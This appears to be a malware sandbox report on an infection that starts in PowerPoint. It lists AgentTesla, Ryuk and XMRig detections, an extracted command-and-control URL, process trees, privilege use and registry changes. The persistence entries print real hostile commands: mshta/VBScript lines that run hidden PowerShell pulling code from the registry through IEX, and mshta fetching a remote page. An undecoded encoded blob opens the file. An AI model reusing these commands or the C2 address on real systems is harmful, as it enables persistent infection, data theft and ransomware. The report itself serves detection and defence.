1nq0nFYp3mVsSroVoshBJzN0S5fh+DtrSFbUf9t/8FJYyN8Fs2iHykS5MY7RAAmdwC4ht5SUHqkcReROrdL96V7+E3hxSEtd39hiWhyGGkM3QLl/F6P0uKVskm0MvSPEOW7yM+gTeXtEjCvIEVpwjkKJ4b3P+hrAEMZbjI74g1cZZzewCffWqG3tmbZodv7WEVP59XxINnUV402gA9p3E9PlIKNtrn484D6szTvmE/ZbIhtFcmxejswyF8AUvz/irw2Zd0IlJr/zrDOwjK5igC5Hp4ushR0MyBWvqVEPJ5y0PSr9X0kiuyaAr6lQa+7UZK0t/o5T7o0kNqoVoshBJzN0S5fh+DtrSFbl2lSUowtW1cS0rLLP4gYQJEPMWnqhyJW95LtYjgii6ExbWTJ6t/x3JMKMXb+TlqmiWhyGGkM3QLl/F6P0uKVscxmdMnbF+H3Wyck+dcR+C/tcHhHajylOcAoCzDShlnHJdXS4Pmnfp/tOeipNc1oMZ1AolcqctWDIs6YALIDAGwFb2xcuV4fcbJzR63xF5LM4HSGKUqqwxaEHtuCauTji81ZsG+ak+TGD+ZgRBSKvp9XswZFl+DUgrKkA62vHafiNS/hR6A1wimSRpA8I+Q/ft2lcydCEgJHLvyltCqTwuwy56xYgqWbXzIn74O/eimEBv1nGY6Veg2SFdoQW6OO1q6DC6wXyfeyWAmGjYZ3FMrqPIoDfJ/5JbBYaMildXwsq+ggO8l8nnsFgpxIW2dBz/KgJ0uAOY5ZM7t+Wl8aq4w7SUJyfDkYXh/423c31S+sq+ggO8l8nnsFgpxIW2dBzfXn3Zlr24rOwUSVjQjPJ2eZFnKlh8BalFh6RrdcYAzS9ZiLGgvyL36etzadTzQteq6DC6wXyfeyWAmGjYZ3FMnrxORhACEXDYyiy2Nyg1sXMa3AGC72lyrJ8UbCOh1GkjnT+SVN+YgxXU3IRCSK+RpqPIoDfJ/5JbBYaMildXwM2HYKA0yBql20a4UfWhHNfxodDYIsbXKvmwTtJ4EWbQ2zLlCu2ylpAG8DCzYKeJrMqiOdBShtC8ZJWPZcE+76Ge4Nx0nWqQcBIPT4Qiig/kHjaD1ifwUELZegIElh0k1V+/qbpsuje4+3Yh1t+kUPOxodDYIsbXKvmwTtJ4EWbQGj2Nghwudp8aCP1mgTYtBpt3bv6rGV+Onknk0uLV/tjNsJGRp0nLdygfG0qr4Hd5v0eZk6Tej4BddKmRfQzWwK+bT7ai7+0GAMcKNylarAixodDYIsbXKvmwTtJ4EWbQiiM6y0skgXfs5Fmf5qjoQ/W

Extracted

Family

agenttesla

http://103.133.105.179/1919/inc/d08414f02917b7.php

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1148	1088	mshta.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1972	1608	powershell.exe	34

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

AgentTesla Payload 3 IoCs

resource	yara_rule
behavioral1/memory/1684-84-0x0000000000437DCE-mapping.dmp	family_agenttesla
behavioral1/memory/1684-83-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral1/memory/1684-85-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla

XMRig Miner Payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/2616-137-0x00000001407102D0-mapping.dmp	xmrig

Blocklisted process makes network request 30 IoCs

flow	pid	Process
7	1148	mshta.exe
9	1148	mshta.exe
11	1148	mshta.exe
13	1148	mshta.exe
15	1148	mshta.exe
17	1148	mshta.exe
19	1148	mshta.exe
21	1148	mshta.exe
22	1148	mshta.exe
24	1148	mshta.exe
27	1148	mshta.exe
28	1148	mshta.exe
29	1148	mshta.exe
30	1148	mshta.exe
32	1148	mshta.exe
33	1148	mshta.exe
36	1972	powershell.exe
38	1972	powershell.exe
40	1972	powershell.exe
42	1972	powershell.exe
48	2056	mshta.exe
49	2056	mshta.exe
50	2056	mshta.exe
51	2056	mshta.exe
52	2056	mshta.exe
55	2328	WScript.exe
56	2328	WScript.exe
58	2328	WScript.exe
60	2328	WScript.exe
62	2328	WScript.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	aspnet_compiler.exe

Executes dropped EXE 1 IoCs

pid	Process
2488	bin.txt

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2616-136-0x0000000140000000-0x0000000140717000-memory.dmp	upx
behavioral1/memory/2616-138-0x0000000140000000-0x0000000140717000-memory.dmp	upx

Loads dropped DLL 1 IoCs

pid	Process
2328	WScript.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)\|IEX\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\taskschd.msc	mmc.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1972 set thread context of 1684	1972	powershell.exe	43
PID 2488 set thread context of 2616	2488	bin.txt	54

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
852	schtasks.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2028	taskkill.exe
1728	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 12 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347D-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348F-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493499-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F0-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493473-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A55-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A72-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "PlotArea"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E551-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E4-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493486-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C0-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E6-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347E-5A91-11CF-8700-00AA0060263B}\ = "FillFormat"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C8-5A91-11CF-8700-00AA0060263B}\ = "CellRange"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CF-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E2-5A91-11CF-8700-00AA0060263B}\ = "EffectInformation"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F2-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A67-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493451-5A91-11CF-8700-00AA0060263B}\ = "_Global"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493470-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A50-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A70-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493465-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493465-5A91-11CF-8700-00AA0060263B}\ = "Hyperlink"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F6-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493489-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C0-5A91-11CF-8700-00AA0060263B}\ = "OCXExtender"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346F-5A91-11CF-8700-00AA0060263B}\ = "ColorScheme"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\ = "SoundEffect"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347D-5A91-11CF-8700-00AA0060263B}\ = "PictureFormat"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493467-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A75-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A77-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493473-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493484-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493495-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D7-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D7-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493490-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A50-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E4-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "ChartArea"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6A-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1088	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1972	powershell.exe
1972	powershell.exe
1684	aspnet_compiler.exe
1684	aspnet_compiler.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1092	mmc.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1684	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
